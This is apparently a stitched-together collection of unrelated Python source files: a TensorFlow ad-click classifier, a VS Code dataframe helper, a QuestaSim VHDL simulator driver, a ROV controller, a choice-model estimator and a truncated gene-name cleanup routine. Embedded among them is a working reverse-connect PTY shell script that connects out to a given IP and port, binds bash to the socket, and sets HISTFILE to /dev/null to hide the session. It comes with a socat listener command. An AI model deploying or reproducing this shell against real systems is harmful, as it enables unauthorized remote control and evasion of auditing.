from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import shutil
import sys
import tempfile
import pandas as pd
from six.moves import urllib
import tensorflow as tf
from data_utils import read_data
from data_utils import read_data_with_sampling
import codecs
isbuyer = tf.feature_column.numeric_column("isbuyer")
buy_freq = tf.feature_column.categorical_column_with_hash_bucket("buy_freq", hash_bucket_size=16, dtype=tf.int64)
visit_freq = tf.feature_column.categorical_column_with_hash_bucket("visit_freq", hash_bucket_size=100, dtype=tf.int64)
buy_interval = tf.feature_column.numeric_column("buy_interval")
sv_interval = tf.feature_column.numeric_column("sv_interval")
expected_time_buy = tf.feature_column.numeric_column("expected_time_buy")
expected_time_visit = tf.feature_column.numeric_column("expected_time_visit")
last_buy = tf.feature_column.categorical_column_with_hash_bucket("last_buy", hash_bucket_size=200, dtype=tf.int64)
last_visit = tf.feature_column.categorical_column_with_hash_bucket("last_visit", hash_bucket_size=200, dtype=tf.int64)
multiple_buy = tf.feature_column.numeric_column("multiple_buy")
multiple_visit = tf.feature_column.numeric_column("multiple_visit")
uniq_urls = tf.feature_column.categorical_column_with_hash_bucket("uniq_urls", hash_bucket_size=256, dtype=tf.int64)
num_checkins = tf.feature_column.categorical_column_with_hash_bucket("num_checkins", hash_bucket_size=37200, dtype=tf.int64)
# Wide columns and deep columns.
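# The "wide" (linear) part of the model memorizes sparse co-occurrences through the
# base and crossed columns below, while the "deep" (DNN) part generalizes through
# embeddings of the hashed categorical columns; build_model() further down wires them
# into a LinearClassifier, a DNNClassifier, or a combined wide-and-deep classifier.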
base_columns = [isbuyer, buy_freq, visit_freq, last_buy, last_visit, multiple_buy, multiple_visit, uniq_urls, num_checkins]
crossed_columns = [
tf.feature_column.crossed_column(["isbuyer", "buy_freq"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["buy_freq", "visit_freq"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["buy_interval", "sv_interval"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["expected_time_buy", "expected_time_visit"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["last_buy", "last_visit"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["uniq_urls", "num_checkins"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["visit_freq", "last_visit", ], hash_bucket_size=1000),
tf.feature_column.crossed_column(["buy_freq", "last_buy", ], hash_bucket_size=1000),
tf.feature_column.crossed_column(["buy_freq", "expected_time_buy", "last_buy", "multiple_buy"], hash_bucket_size=1000),
tf.feature_column.crossed_column(["visit_freq", "expected_time_visit", "last_visit", "multiple_visit"], hash_bucket_size=1000)
]
deep_columns = [isbuyer,
tf.feature_column.embedding_column(buy_freq, dimension=4),
tf.feature_column.embedding_column(visit_freq, dimension=8),
buy_interval, sv_interval, expected_time_buy, expected_time_visit,
tf.feature_column.embedding_column(last_buy, dimension=8),
tf.feature_column.embedding_column(last_visit, dimension=8),
tf.feature_column.embedding_column(uniq_urls, dimension=8),
tf.feature_column.embedding_column(num_checkins, dimension=16)]
def build_model(model_dir, model_type):
if model_type == "wide":
m = tf.estimator.LinearClassifier(
model_dir=model_dir, feature_columns=base_columns + crossed_columns)
elif model_type == "deep":
m = tf.estimator.DNNClassifier(
model_dir=model_dir,
feature_columns=deep_columns,
hidden_units=[100, 50])
else:
m = tf.estimator.DNNLinearCombinedClassifier(
model_dir=model_dir,
linear_feature_columns=base_columns + crossed_columns,
dnn_feature_columns=deep_columns,
dnn_hidden_units=[100, 50])
return m
def train_and_eval(model_dir, model_type, train_steps, train_file_name, valid_file_name, test_file_name, result_file):
model_dir = tempfile.mkdtemp() if not model_dir else model_dir
m = build_model(model_dir, model_type)
# set num_epochs to None to get infinite stream of data.
rf = codecs.open(result_file, mode='w', encoding='utf-8')
session_config = tf.ConfigProto(allow_soft_placement=True)
session_config.gpu_options.allow_growth=True
with tf.Session(config=session_config) as sess:
#m.train(input_fn=read_data(train_file_name, num_epochs=None, shuffle=True), steps=train_steps)
m.train(input_fn=read_data_with_sampling(train_file_name, num_epochs=None, shuffle=True), steps=train_steps)
eval_result = m.evaluate(input_fn=read_data(valid_file_name, num_epochs=1, shuffle=False), steps=None)
print("model directory = %s" % model_dir)
for key in sorted(eval_result):
print("%s: %s" % (key, eval_result[key]))
predictions = m.predict(input_fn=read_data(test_file_name, num_epochs=1, shuffle=False), predict_keys="classes")
predictions = list(predictions)
for p in predictions:
      rf.write(str(p["classes"][0], encoding='utf-8'))
rf.write("\n")
FLAGS = None
def main(_):
train_and_eval(FLAGS.model_dir + "_" + FLAGS.model_type, FLAGS.model_type, FLAGS.train_steps, FLAGS.train_data, FLAGS.valid_data, FLAGS.test_data, FLAGS.model_type + "_" + FLAGS.result_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.register("type", "bool", lambda v: v.lower() == "true")
parser.add_argument(
"--model_dir",
type=str,
default="./model/model",
help="Base directory for output models."
)
parser.add_argument(
"--model_type",
type=str,
default="wide_n_deep",
help="Valid model types: {'wide', 'deep', 'wide_n_deep'}."
)
parser.add_argument(
"--train_steps",
type=int,
default=5000,
help="Number of training steps."
)
parser.add_argument(
"--train_data",
type=str,
default="./data/train.csv",
help="Path to the training data."
)
parser.add_argument(
"--valid_data",
type=str,
default="./data/valid.csv",
help="Path to the valid data."
)
parser.add_argument(
"--test_data",
type=str,
default="./data/ads_test.csv",
#default="./data/valid.csv",
help="Path to the test data."
)
parser.add_argument(
"--result_file",
type=str,
default="result.csv",
help="Path to the result data."
)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
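# A hypothetical example invocation (the script name and data paths are placeholders;
# the flags match the argparse definitions above):
#
#   python wide_n_deep.py --model_type wide_n_deep --train_steps 5000 \
#       --train_data ./data/train.csv --valid_data ./data/valid.csv \
#       --test_data ./data/ads_test.csv --result_file result.csv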
|
# Query Jupyter server for the info about a dataframe
import json as _VSCODE_json
import pandas as _VSCODE_pd
# _VSCode_sub_supportsDataExplorer will contain our list of data explorer supported types
_VSCode_supportsDataExplorer = "['list', 'Series', 'dict', 'ndarray', 'DataFrame']"
# In IJupyterVariables.getValue this '_VSCode_JupyterTestValue' will be replaced with the json stringified value of the target variable
# Indexes off of _VSCODE_targetVariable need to index types that are part of IJupyterVariable
_VSCODE_targetVariable = _VSCODE_json.loads('_VSCode_JupyterTestValue')
# First check to see if we are a supported type, this prevents us from adding types that are not supported
# and also keeps our types in sync with what the variable explorer says that we support
if _VSCODE_targetVariable['type'] not in _VSCode_supportsDataExplorer:
del _VSCode_supportsDataExplorer
print(_VSCODE_json.dumps(_VSCODE_targetVariable))
del _VSCODE_targetVariable
else:
del _VSCode_supportsDataExplorer
_VSCODE_evalResult = eval(_VSCODE_targetVariable['name'])
# First list out the columns of the data frame (assuming it is one for now)
_VSCODE_columnTypes = []
_VSCODE_columnNames = []
if _VSCODE_targetVariable['type'] == 'list':
_VSCODE_evalResult = _VSCODE_pd.DataFrame(_VSCODE_evalResult)
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
elif _VSCODE_targetVariable['type'] == 'Series':
_VSCODE_evalResult = _VSCODE_pd.Series.to_frame(_VSCODE_evalResult)
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
elif _VSCODE_targetVariable['type'] == 'dict':
_VSCODE_evalResult = _VSCODE_pd.Series(_VSCODE_evalResult)
_VSCODE_evalResult = _VSCODE_pd.Series.to_frame(_VSCODE_evalResult)
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
elif _VSCODE_targetVariable['type'] == 'ndarray':
_VSCODE_evalResult = _VSCODE_pd.DataFrame(_VSCODE_evalResult)
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
elif _VSCODE_targetVariable['type'] == 'DataFrame':
_VSCODE_columnTypes = list(_VSCODE_evalResult.dtypes)
_VSCODE_columnNames = list(_VSCODE_evalResult)
# Make sure we have an index column (see code in getJupyterVariableDataFrameRows.py)
if 'index' not in _VSCODE_columnNames:
_VSCODE_columnNames.insert(0, 'index')
_VSCODE_columnTypes.insert(0, 'int64')
# Then loop and generate our output json
_VSCODE_columns = []
for _VSCODE_n in range(0, len(_VSCODE_columnNames)):
_VSCODE_column_name = _VSCODE_columnNames[_VSCODE_n]
_VSCODE_column_type = _VSCODE_columnTypes[_VSCODE_n]
_VSCODE_colobj = {}
_VSCODE_colobj['key'] = _VSCODE_column_name
_VSCODE_colobj['name'] = _VSCODE_column_name
_VSCODE_colobj['type'] = str(_VSCODE_column_type)
_VSCODE_columns.append(_VSCODE_colobj)
del _VSCODE_column_name
del _VSCODE_column_type
del _VSCODE_columnNames
del _VSCODE_columnTypes
# Save this in our target
_VSCODE_targetVariable['columns'] = _VSCODE_columns
del _VSCODE_columns
# Figure out shape if not already there. Use the shape to compute the row count
if (hasattr(_VSCODE_evalResult, "shape")):
_VSCODE_targetVariable['rowCount'] = _VSCODE_evalResult.shape[0]
elif _VSCODE_targetVariable['type'] == 'list':
_VSCODE_targetVariable['rowCount'] = len(_VSCODE_evalResult)
else:
_VSCODE_targetVariable['rowCount'] = 0
# Transform this back into a string
print(_VSCODE_json.dumps(_VSCODE_targetVariable))
del _VSCODE_targetVariable
|
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
#
# ==============================================================================
# Authors: Patrick Lehmann
# Martin Zabel
#
# Python Module: Mentor QuestaSim simulator.
#
# License:
# ==============================================================================
# Copyright 2007-2016 Technische Universitaet Dresden - Germany
# Chair of VLSI-Design, Diagnostics and Architecture
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
from pathlib import Path
from textwrap import dedent
from Base.Project import FileTypes, ToolChain, Tool
from DataBase.Config import Vendors
from ToolChains.Mentor.QuestaSim import QuestaSim, QuestaSimException
from Simulator import VHDL_TESTBENCH_LIBRARY_NAME, SimulatorException, SkipableSimulatorException, SimulationSteps, Simulator as BaseSimulator
__api__ = [
'Simulator'
]
__all__ = __api__
class Simulator(BaseSimulator):
TOOL_CHAIN = ToolChain.Mentor_QuestaSim
TOOL = Tool.Mentor_vSim
def __init__(self, host, dryRun, simulationSteps):
# A separate elaboration step is not implemented in QuestaSim
simulationSteps &= ~SimulationSteps.Elaborate
super().__init__(host, dryRun, simulationSteps)
vSimSimulatorFiles = host.PoCConfig['CONFIG.DirectoryNames']['QuestaSimFiles']
self.Directories.Working = host.Directories.Temp / vSimSimulatorFiles
self.Directories.PreCompiled = host.Directories.PreCompiled / vSimSimulatorFiles
if (SimulationSteps.CleanUpBefore in self._simulationSteps):
pass
if (SimulationSteps.Prepare in self._simulationSteps):
self._PrepareSimulationEnvironment()
self._PrepareSimulator()
def _PrepareSimulator(self):
# create the QuestaSim executable factory
self.LogVerbose("Preparing Mentor simulator.")
# for sectionName in ['INSTALL.Mentor.QuestaSim', 'INSTALL.Mentor.ModelSim', 'INSTALL.Altera.ModelSim']:
# if (len(self.Host.PoCConfig.options(sectionName)) != 0):
# break
# else:
# XXX: check SectionName if ModelSim is configured
# raise NotConfiguredException(
# "Neither Mentor Graphics QuestaSim, ModelSim PE nor ModelSim Altera-Edition are configured on this system.")
# questaSection = self.Host.PoCConfig[sectionName]
# binaryPath = Path(questaSection['BinaryDirectory'])
# version = questaSection['Version']
binaryPath = Path(self.Host.PoCConfig['INSTALL.ModelSim']['BinaryDirectory'])
version = self.Host.PoCConfig['INSTALL.ModelSim']['Version']
self._toolChain = QuestaSim(self.Host.Platform, self.DryRun, binaryPath, version, logger=self.Logger)
def Run(self, testbench, board, vhdlVersion, vhdlGenerics=None):
# TODO: refactor into a ModelSim module, shared by QuestaSim and Cocotb (-> MixIn class)?
# select modelsim.ini
self._modelsimIniPath = self.Directories.PreCompiled
if board.Device.Vendor is Vendors.Altera:
self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['AlteraSpecificFiles']
elif board.Device.Vendor is Vendors.Lattice:
self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['LatticeSpecificFiles']
elif board.Device.Vendor is Vendors.Xilinx:
self._modelsimIniPath /= self.Host.PoCConfig['CONFIG.DirectoryNames']['XilinxSpecificFiles']
self._modelsimIniPath /= "modelsim.ini"
if not self._modelsimIniPath.exists():
raise SimulatorException("Modelsim ini file '{0!s}' not found.".format(self._modelsimIniPath)) \
from FileNotFoundError(str(self._modelsimIniPath))
super().Run(testbench, board, vhdlVersion, vhdlGenerics)
def _RunAnalysis(self, _):
# create a QuestaVHDLCompiler instance
vlib = self._toolChain.GetVHDLLibraryTool()
for lib in self._pocProject.VHDLLibraries:
vlib.Parameters[vlib.SwitchLibraryName] = lib.Name
vlib.CreateLibrary()
# create a QuestaVHDLCompiler instance
vcom = self._toolChain.GetVHDLCompiler()
vcom.Parameters[vcom.FlagQuietMode] = True
vcom.Parameters[vcom.FlagExplicit] = True
vcom.Parameters[vcom.FlagRangeCheck] = True
vcom.Parameters[vcom.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix()
vcom.Parameters[vcom.SwitchVHDLVersion] = repr(self._vhdlVersion)
recompileScriptContent = dedent("""\
puts "Recompiling..."
""")
# run vcom compile for each VHDL file
for file in self._pocProject.Files(fileType=FileTypes.VHDLSourceFile):
if (not file.Path.exists()): raise SimulatorException("Cannot analyse '{0!s}'.".format(file.Path)) from FileNotFoundError(str(file.Path))
vcomLogFile = self.Directories.Working / (file.Path.stem + ".vcom.log")
vcom.Parameters[vcom.SwitchVHDLLibrary] = file.LibraryName
vcom.Parameters[vcom.ArgLogFile] = vcomLogFile
vcom.Parameters[vcom.ArgSourceFile] = file.Path
try:
vcom.Compile()
except QuestaSimException as ex:
raise SimulatorException("Error while compiling '{0!s}'.".format(file.Path)) from ex
if vcom.HasErrors:
raise SkipableSimulatorException("Error while compiling '{0!s}'.".format(file.Path))
# delete empty log files
if (vcomLogFile.stat().st_size == 0):
try:
vcomLogFile.unlink()
except OSError as ex:
raise SimulatorException("Error while deleting '{0!s}'.".format(vcomLogFile)) from ex
# collecting all compile commands in a buffer
recompileScriptContent += dedent("""\
puts " Compiling '{file}'..."
{tcl}
""").format(
file=file.Path.as_posix(),
tcl=vcom.GetTclCommand()
)
recompileScriptContent += dedent("""\
puts "Recompilation done"
puts "Restarting simulation..."
restart -force
puts "Simulation is restarted."
""")
recompileScriptContent = recompileScriptContent.replace("\\", "/") # WORKAROUND: to convert all paths to Tcl compatible paths.
recompileScriptPath = self.Directories.Working / "recompile.do"
self.LogDebug("Writing recompile script to '{0!s}'".format(recompileScriptPath))
with recompileScriptPath.open('w') as fileHandle:
fileHandle.write(recompileScriptContent)
def _RunSimulation(self, testbench):
if (SimulationSteps.ShowWaveform in self._simulationSteps):
return self._RunSimulationWithGUI(testbench)
tclBatchFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimBatchScript']
tclDefaultBatchFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultBatchScript']
# create a QuestaSimulator instance
vsim = self._toolChain.GetSimulator()
vsim.Parameters[vsim.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix()
# vsim.Parameters[vsim.FlagOptimization] = True # FIXME:
vsim.Parameters[vsim.FlagReportAsError] = "3473"
vsim.Parameters[vsim.SwitchTimeResolution] = "1fs"
vsim.Parameters[vsim.FlagCommandLineMode] = True
vsim.Parameters[vsim.SwitchTopLevel] = "{0}.{1}".format(VHDL_TESTBENCH_LIBRARY_NAME, testbench.ModuleName)
# find a Tcl batch script for the BATCH mode
vsimBatchCommand = ""
if (tclBatchFilePath.exists()):
self.LogDebug("Found Tcl script for BATCH mode: '{0!s}'".format(tclBatchFilePath))
vsimBatchCommand += "do {0};".format(tclBatchFilePath.as_posix())
elif (tclDefaultBatchFilePath.exists()):
self.LogDebug("Falling back to default Tcl script for BATCH mode: '{0!s}'".format(tclDefaultBatchFilePath))
vsimBatchCommand += "do {0};".format(tclDefaultBatchFilePath.as_posix())
else:
raise QuestaSimException("No Tcl batch script for BATCH mode found.") \
from FileNotFoundError(str(tclDefaultBatchFilePath))
vsim.Parameters[vsim.SwitchBatchCommand] = vsimBatchCommand
testbench.Result = vsim.Simulate()
def _RunSimulationWithGUI(self, testbench):
tclGUIFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimGUIScript']
tclWaveFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimWaveScript']
tclDefaultGUIFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultGUIScript']
tclDefaultWaveFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultWaveScript']
# create a QuestaSimulator instance
vsim = self._toolChain.GetSimulator()
vsim.Parameters[vsim.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix()
# vsim.Parameters[vsim.FlagOptimization] = True # FIXME:
vsim.Parameters[vsim.FlagReportAsError] = "3473"
vsim.Parameters[vsim.SwitchTimeResolution] = "1fs"
vsim.Parameters[vsim.FlagGuiMode] = True
vsim.Parameters[vsim.SwitchTopLevel] = "{0}.{1}".format(VHDL_TESTBENCH_LIBRARY_NAME, testbench.ModuleName)
# vsim.Parameters[vsim.SwitchTitle] = testbenchName
vsimDefaultWaveCommands = "add wave *"
# find a Tcl batch script to load predefined signals in the waveform window
vsimBatchCommand = ""
self.LogDebug("'{0!s}'\n '{1!s}'".format(tclWaveFilePath, self.Host.Directories.Root))
if (tclWaveFilePath != self.Host.Directories.Root):
if (tclWaveFilePath.exists()):
self.LogDebug("Found waveform script: '{0!s}'".format(tclWaveFilePath))
vsimBatchCommand = "do {0};".format(tclWaveFilePath.as_posix())
elif (tclDefaultWaveFilePath != self.Host.Directories.Root):
if (tclDefaultWaveFilePath.exists()):
self.LogDebug("Found default waveform script: '{0!s}'".format(tclDefaultWaveFilePath))
vsimBatchCommand = "do {0};".format(tclDefaultWaveFilePath.as_posix())
else:
self.LogDebug("Couldn't find default waveform script: '{0!s}'. Loading default command '{1}'.".format(tclDefaultWaveFilePath, vsimDefaultWaveCommands))
vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands)
else:
self.LogDebug("Couldn't find waveform script: '{0!s}'. Loading default command '{1}'.".format(tclWaveFilePath, vsimDefaultWaveCommands))
vsim.Parameters[vsim.SwitchBatchCommand] = "{0};".format(vsimDefaultWaveCommands)
elif (tclDefaultWaveFilePath != self.Host.Directories.Root):
if (tclDefaultWaveFilePath.exists()):
self.LogDebug("Falling back to default waveform script: '{0!s}'".format(tclDefaultWaveFilePath))
vsimBatchCommand = "do {0};".format(tclDefaultWaveFilePath.as_posix())
else:
self.LogDebug("Couldn't find default waveform script: '{0!s}'. Loading default command '{1}'.".format(tclDefaultWaveFilePath, vsimDefaultWaveCommands))
vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands)
else:
self.LogWarning("No waveform script specified. Loading default command '{1}'.".format(vsimDefaultWaveCommands))
vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands)
# find a Tcl batch script for the GUI mode
vsimRunScript = ""
if (tclGUIFilePath.exists()):
self.LogDebug("Found Tcl script for GUI mode: '{0!s}'".format(tclGUIFilePath))
vsimRunScript = tclGUIFilePath.as_posix()
vsimBatchCommand += "do {0};".format(vsimRunScript)
elif (tclDefaultGUIFilePath.exists()):
self.LogDebug("Falling back to default Tcl script for GUI mode: '{0!s}'".format(tclDefaultGUIFilePath))
vsimRunScript = tclDefaultGUIFilePath.as_posix()
vsimBatchCommand += "do {0};".format(vsimRunScript)
else:
raise QuestaSimException("No Tcl batch script for GUI mode found.") \
from FileNotFoundError(str(tclDefaultGUIFilePath))
vsim.Parameters[vsim.SwitchBatchCommand] = vsimBatchCommand
# writing a relaunch file
recompileScriptPath = self.Directories.Working / "recompile.do"
relaunchScriptPath = self.Directories.Working / "relaunch.do"
saveWaveformScriptPath = self.Directories.Working / "saveWaveform.do"
relaunchScriptContent = dedent("""\
puts "Loading recompile script '{recompileScript}'..."
do {recompileScript}
puts "Loading run script '{runScript}'..."
do {runScript}
""").format(
recompileScript=recompileScriptPath.as_posix(),
runScript=vsimRunScript
)
self.LogDebug("Writing relaunch script to '{0!s}'".format(relaunchScriptPath))
with relaunchScriptPath.open('w') as fileHandle:
fileHandle.write(relaunchScriptContent)
# writing a saveWaveform file
saveWaveformScriptContent = dedent("""\
puts "Saving waveform settings to '{waveformFile}'..."
write format wave -window .main_pane.wave.interior.cs.body.pw.wf {waveformFile}
""").format(
waveformFile=tclWaveFilePath.as_posix()
)
self.LogDebug("Writing saveWaveform script to '{0!s}'".format(saveWaveformScriptPath))
with saveWaveformScriptPath.open('w') as fileHandle:
fileHandle.write(saveWaveformScriptContent)
testbench.Result = vsim.Simulate()
|
from abc import ABCMeta, abstractmethod
from pyopenproject.business.abstract_service import AbstractService
class PreviewingService(AbstractService):
"""
Class PreviewingService,
service for previewing endpoint
"""
__metaclass__ = ABCMeta
def __init__(self, connection):
super().__init__(connection)
@abstractmethod
def from_markdown(self, text, context=None): raise NotImplementedError
@abstractmethod
def from_plain(self, text): raise NotImplementedError
|
#!/usr/bin/python2
"""
Reverse Connect TCP PTY Shell - v1.0
infodox - insecurety.net (2013)
Gives a reverse connect PTY over TCP.
For an excellent listener use the following socat command:
socat file:`tty`,echo=0,raw tcp4-listen:PORT
Or use the included tcp_pty_shell_handler.py
"""
import os
import pty
import sys
import socket
def main():
if len(sys.argv) < 3:
print("Usage:\n " + sys.argv[0] + " <ip> <port>\n")
exit(1)
rhost = str(sys.argv[1])
rport = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, rport))
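    # duplicate the socket file descriptor onto stdin (0), stdout (1) and stderr (2)
    # so the spawned shell's I/O travels over the TCP connection; HISTFILE is pointed
    # at /dev/null so the interactive session leaves no shell history behind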
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
# Copyright (c) 2016 The UUV Simulator Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import numpy as np
from uuv_control_interfaces import DPPIDControllerBase
from uuv_control_msgs.srv import *
class ROV_MBFLController(DPPIDControllerBase):
"""
    Model-based Feedback Linearization Controller
Reference:
Thor I. Fossen 2011
Handbook of Marine Craft Hydrodynamics and Motion Control
"""
_LABEL = 'Model-based Feedback Linearization Controller'
def __init__(self):
DPPIDControllerBase.__init__(self, True)
self._logger.info('Initializing: ' + self._LABEL)
# Control forces and torques
self._tau = np.zeros(6)
# PID control vector
self._pid_control = np.zeros(6)
self._is_init = True
self._last_vel = np.zeros(6)
self._last_t = None
self._logger.info(self._LABEL + ' ready')
def _reset_controller(self):
super(ROV_MBFLController, self).reset_controller()
self._pid_control = np.zeros(6)
self._tau = np.zeros(6)
def update_controller(self):
if not self._is_init:
return False
t = rospy.get_time()
if self._last_t is None:
self._last_t = t
self._last_vel = self._vehicle_model.to_SNAME(self._reference['vel'])
return False
dt = t - self._last_t
if dt <= 0:
self._last_t = t
self._last_vel = self._vehicle_model.to_SNAME(self._reference['vel'])
return False
self._pid_control = self.update_pid()
vel = self._vehicle_model.to_SNAME(self._reference['vel'])
acc = (vel - self._last_vel) / dt
self._vehicle_model._update_damping(vel)
self._vehicle_model._update_coriolis(vel)
self._vehicle_model._update_restoring(q=self._reference['rot'], use_sname=True)
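        # Model-based feedback linearization (Fossen 2011): the feedforward wrench is
        #   tau = M * acc + C(vel) * vel + D(vel) * vel + g
        # computed in SNAME coordinates; the PID correction is added on top when the
        # control wrench is published below.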
self._tau = np.dot(self._vehicle_model.Mtotal, acc) + \
np.dot(self._vehicle_model.Ctotal, vel) + \
np.dot(self._vehicle_model.Dtotal, vel) + \
self._vehicle_model.restoring_forces
# Publish control forces and torques
self.publish_control_wrench(self._pid_control + self._vehicle_model.from_SNAME(self._tau))
self._last_t = t
self._last_vel = self._vehicle_model.to_SNAME(self._reference['vel'])
return True
if __name__ == '__main__':
    print('Starting Model-based Feedback Linearization Controller')
rospy.init_node('rov_mb_fl_controller')
try:
node = ROV_MBFLController()
rospy.spin()
except rospy.ROSInterruptException:
print('caught exception')
print('exiting')
|
import functools
import torch.nn as nn
from csrank.discrete_choice_losses import CategoricalHingeLossMax
from csrank.discretechoice.discrete_choice import SkorchDiscreteChoiceFunction
from csrank.modules.object_mapping import DenseNeuralNetwork
from csrank.modules.scoring import FATEScoring
class FATEDiscreteChoiceFunction(SkorchDiscreteChoiceFunction):
"""A discrete choice estimator based on the FATE-Approach.
See the documentation of :class:`csrank.modules.scoring.FATEScoring` for
more details.
Parameters
----------
n_hidden_set_layers : int
The number of hidden layers that should be used for the ``DeepSet``
context embedding.
    n_hidden_set_units : int
The number of units per hidden layer that should be used for the
``DeepSet`` context embedding.
n_hidden_joint_layers : int
The number of hidden layers that should be used for the utility
function that evaluates each object in the aggregated context.
n_hidden_joint_units : int
        The number of units per hidden layer that should be used for the utility
function that evaluates each object in the aggregated context.
activation : torch activation function (class)
The activation function that should be used for each layer of the two
("set" and "joint) neural networks.
choice_size : int
The size of the target choice set.
criterion : torch criterion (class)
The criterion that is used to evaluate and optimize the module.
**kwargs : skorch NeuralNet arguments
All keyword arguments are passed to the constructor of
        ``SkorchDiscreteChoiceFunction``. See the documentation of that class for more
details.
"""
def __init__(
self,
n_hidden_set_layers=2,
n_hidden_set_units=32,
n_hidden_joint_layers=2,
n_hidden_joint_units=32,
activation=nn.SELU,
choice_size=1,
criterion=CategoricalHingeLossMax,
**kwargs
):
self.n_hidden_set_layers = n_hidden_set_layers
self.n_hidden_set_units = n_hidden_set_units
self.n_hidden_joint_layers = n_hidden_joint_layers
self.n_hidden_joint_units = n_hidden_joint_units
self.activation = activation
super().__init__(
module=FATEScoring, criterion=criterion, choice_size=choice_size, **kwargs
)
def _get_extra_module_parameters(self):
"""Return extra parameters that should be passed to the module."""
params = super()._get_extra_module_parameters()
params["pairwise_utility_module"] = functools.partial(
DenseNeuralNetwork,
hidden_layers=self.n_hidden_joint_layers,
units_per_hidden=self.n_hidden_joint_units,
activation=self.activation(),
output_size=1,
)
params["embedding_module"] = functools.partial(
DenseNeuralNetwork,
hidden_layers=self.n_hidden_set_layers,
units_per_hidden=self.n_hidden_set_units,
activation=self.activation(),
)
return params
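# A minimal usage sketch (hypothetical data shapes and skorch-style keyword arguments
# such as ``max_epochs``; the numpy-array fit/predict interface is assumed to come
# from SkorchDiscreteChoiceFunction and is not defined in this module):
#
#   import numpy as np
#   dc = FATEDiscreteChoiceFunction(n_hidden_set_units=16, max_epochs=10)
#   X = np.random.rand(128, 10, 8).astype(np.float32)   # 128 sets of 10 objects, 8 features each
#   Y = np.eye(10, dtype=np.float32)[np.random.randint(0, 10, size=128)]  # one-hot chosen object per set
#   dc.fit(X, Y)
#   choices = dc.predict(X)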
|
#!/usr/bin/env python
__author__ = 'sreynolds'
## if this is set to 1 there will be a TON of debug output ...
debugFlag = 0
import argparse
import commands
import json
import math
import random
import sys
import time
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def cleanUpName ( aName ):
bName = ''
aName = aName.upper()
## ii = aName.find(" - Homo sapiens (human)")
ii = aName.find(" - HOMO SAPIENS (HUMAN)")
if ( ii >= 0 ):
aName = aName[:ii]
aName = aName.strip()
ii = aName.find("(")
while ( ii >= 0 ):
jj = aName.find(")",ii)
aName = aName[:ii] + aName[jj+1:]
ii = aName.find("(")
aName = aName.strip()
ii = aName.find("<")
while ( ii >= 0 ):
jj = aName.find(">",ii)
aName = aName[:ii] + aName[jj+1:]
ii = aName.find("<")
aName = aName.strip()
for ii in range(len(aName)):
if ( aName[ii] == ',' ):
continue
elif ( aName[ii] == '(' ):
bName += '_'
elif ( aName[ii] == ')' ):
bName += '_'
elif ( aName[ii] == '-' ):
bName += '_'
elif ( aName[ii] == '/' ):
bName += '_'
elif ( aName[ii] == ';' ):
bName += '_'
elif ( aName[ii] == '&' ):
continue
elif ( aName[ii] == '#' ):
continue
elif ( aName[ii] == ' ' ):
bName += '_'
else:
bName += aName[ii].upper()
ii = bName.find("__")
while ( ii >= 0 ):
## print " ", ii, bName
bName = bName[:ii] + bName[ii+1:]
## print " ", bName
ii = bName.find("__")
